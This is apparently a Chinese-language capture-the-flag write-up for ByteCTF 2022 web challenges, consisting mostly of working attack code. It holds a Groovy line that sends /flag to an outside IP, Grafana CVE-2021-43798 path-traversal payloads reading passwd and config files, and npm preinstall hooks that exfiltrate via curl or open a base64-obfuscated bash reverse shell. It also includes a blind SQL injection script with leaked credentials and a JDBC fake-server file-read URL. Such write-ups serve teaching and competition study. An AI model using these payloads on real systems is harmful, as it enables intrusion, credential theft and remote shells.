2022bytectf

easy_groovy

1 2	String aa = new File("/flag").text def res1 = new URL('http://116.62.240.148:7077?a=' + aa).text;

easy_grafana

8.2.6的版本对应有相应的漏洞

CVE-2021-43798：Grafana任意文件读取漏洞 - 腾讯云开发者社区-腾讯云 (tencent.com)

Grafana 文件读取漏洞分析与汇总(CVE-2021-43798) - 斗象能力中心

(1条消息) Grafana任意文件读取漏洞(CVE-2021-43798)复现_xzhome的博客-CSDN博客_graphite漏洞

受影响的插件

/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

GET /public/plugins/text/#/../../../../../../../../../../etc/passwd HTTP/1.1
Host: c874aa39d7f9b70cfc97b964cee72ca5.2022.capturetheflag.fun
Cookie: __t_id=9d390487baa727875304965b05e864f7; redirect_to=%2F
Sec-Ch-Ua: "Microsoft Edge";v="105", " Not;A Brand";v="99", "Chromium";v="105"
Accept: application/json, text/plain, */*
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50
Sec-Ch-Ua-Platform: "Windows"
Origin: https://c874aa39d7f9b70cfc97b964cee72ca5.2022.capturetheflag.fun
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://c874aa39d7f9b70cfc97b964cee72ca5.2022.capturetheflag.fun/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

读取配置文件

1 2	GET /public/plugins/text/#/../../../../../../../../../../etc/grafana/grafana.ini HTTP/1.1 secret_key = SW2YcwTIb9zpO1hoPsMm

1	/public/plugins/text/#/../../../../../../../../../../usr/share/grafana/conf/defaults.ini

发现登录不上去，读数据库/var/lib/grafana/grafana.db

jas502n/Grafana-CVE-2021-43798: Grafana Unauthorized arbitrary file reading vulnerability (github.com)

对password进行AES解密得flag，密钥用之前的secret_key

ctf_cloud

然后用户admin，密码1登录

文件上传

{
  "name": "sk1y",
  "version": "0.0.1",
  "scripts": {
    "preinstall": "bash -c 'curl http://ip:7007/ -F --file=@/flag'"
  }
}

添加依赖

1	{"dependencies":{"sk1y": "file:./public/uploads/"}}

监听端口，然后点击编译

或者反弹shell，将依赖设置为

{
  "name": "sk1y",
  "version": "0.0.1",
  "scripts": {
    "preinstall": "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMjQwLjE0OC83MDA3IDA+JjE=|base64 -d|bash"
  }
}

再或者不使用文件上传功能，根据WM战队的wp，将package.json传到github公开库

先往github仓库上传一个package.json，然后post提交依赖

然后在管理员用户下编译

datamanager

随意注册然后登录，/dashboard?order=id处存在SQL注入

贴一下wm师傅们的脚本

from sre_constants import SUCCESS
import requests
requests = requests.Session()
import string

proxies = {}
import warnings
warnings.filterwarnings("ignore")

headers = {
    "Cookie": "__t_id=7267900aaba9b607c88b9639ae26899a; JSESSIONID=C1032349BC4000AE184AD31889B5B0F3",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"

}

#database() == datamanager
url = "<https://b9cf435899298a5ccde1a16acc13260e.2022.capturetheflag.fun/dashboard?order=id> and case when (database() like PAYLOAD) then 1 else 9223372036854775807%2B1 end"

#tables : source,users
url = "<https://b9cf435899298a5ccde1a16acc13260e.2022.capturetheflag.fun/dashboard?order=id> and case when ((select group_concat(table_name) from information_schema.tables where table_schema like 0x646174616d616e61676572) like PAYLOAD) then 1 else 9223372036854775807%2B1 end"

#columns from users: current\\_connections,total\\_connections,user,id,n4me,pas$word
url = "<https://b9cf435899298a5ccde1a16acc13260e.2022.capturetheflag.fun/dashboard?order=id> and case when ((select group_concat(column_name) from information_schema.columns where table_name like 0x7573657273) like PAYLOAD) then 1 else 9223372036854775807%2B1 end"

#n4me from users: ctf,...
url = "<https://b9cf435899298a5ccde1a16acc13260e.2022.capturetheflag.fun/dashboard?order=id> and case when ((select group_concat(n4me) from users) like PAYLOAD) then 1 else 9223372036854775807%2B1 end"

#pas$word from users: ctf@BvteDaNceS3cRet,...
url = "<https://b9cf435899298a5ccde1a16acc13260e.2022.capturetheflag.fun/dashboard?order=id> and case when ((select group_concat(pas$word) from users) like PAYLOAD) then 1 else 9223372036854775807%2B1 end"

def main():
    flag = ""
    while 1:
        success = False
        for i in string.printable[:-6]:
            if i in "_%[]":
                i = "\\\\"+i
            payload = "0x"
            for item in flag:
                payload += "%02x" % ord(item)
            for item in i:
                payload += "%02x" % ord(item)
            payload += "25"
            #print(payload)
            r = requests.get(url.replace("PAYLOAD",payload),proxies=proxies,headers=headers,verify=False,timeout=3)
            #if "SORRY!" not in r.text:
            if r.status_code == 200:
                flag += i
                print(flag)
                success = True
                break
        if success:
            continue
        else:
            print("failed",flag)
            raise Exception("failed")

if __name__ == "__main__":
    main()

SQL注入得到用户名和密码

1 2	ctf ctf@BvteDaNceS3cRet

status处可以执行任意sql语句

select database();
Result: [[datamanager]]

select version();
Result: [[8.0.30]]

select group_concat(table_name) from information_schema.tables;
Result: [[source,users,ADMINISTRABLE_ROLE_AUTHORIZATIONS,APPLICABLE_ROLES,CHARACTER_SETS,CHECK_CONSTRAINTS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMNS_EXTENSIONS,COLUMN_PRIVILEGES,COLUMN_STATISTICS,ENABLED_ROLES,ENGINES,EVENTS,FILES,INNODB_BUFFER_PAGE,INNODB_BUFFER_PAGE_LRU,INNODB_BUFFER_POOL_STATS,INNODB_CACHED_INDEXES,INNODB_CMP,INNODB_CMPMEM,INNODB_CMPMEM_RESET,INNODB_CMP_PER_INDEX,INNODB_CMP_PER_INDEX_RESET,INNODB_CMP_RESET,INNODB_COLUMNS,INNODB_DATAFILES,INNODB_FIELDS,INNODB_FOREIGN,INNODB_FOREIGN_COLS,INNODB_FT_BEING_DELETED,INNODB_FT_CONFIG,INNODB_FT_DEFAULT_STOPWORD,INNODB_FT_DELETED,INNODB_FT_INDEX_CACHE,INNODB_FT_INDEX_TABLE,INNODB_INDEXES,INNODB_METRICS,INNODB_SESSION_TEMP_TABLESPACES,INNODB_TABLES,INNODB_TABLESPACES,INNODB_TABLESPACES_BRIEF,INNODB_TABLESTATS,INNODB_TEMP_TABLE_INFO,INNODB_TRX,INNODB_VIRTUAL,KEYWORDS,KEY_COLUMN_USAGE,OPTIMIZER_TRACE,PARAMETERS,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,RESOURCE_GROUPS,ROLE_COLUMN_GRANTS,ROLE_ROUTINE_GRANTS,ROLE_TABLE]]

select * from source;
Result: [[1, 1, public mysql server, -, 3306, mysql, Running, root, mySql_Super_Str0ng_paSSw0rb], [2, 1, internal cache server, ***, ***, redis, Running, -, redis_means_Remote_D1ctionary_Server]]

show variables;
...[secure_file_priv, /tmp/]...

connection test可以执行jdbc

使用用mysql fake server来读文件。需要修改一下 mysqlproto/protocol/handshake.py的72行d[2]改成0x21 否则报错

但是没有像WM战队的使用netdoc复现成功

1	url=jdbc:mysql://ip:7007/jdbc?allowLoadLocalInfile=true&maxAllowedPacket=655360&allowUrlInLocalInfile=true&username=fileread_/very_Str4nge_NamE_of_flag&password=5

参考链接：

ByteCTF 2022 By W&M - W&M Team (wm-team.cn)
EDISEC战队的wp:https://mp.weixin.qq.com/s/kLmQLCCbByQ15LgGWeHk3g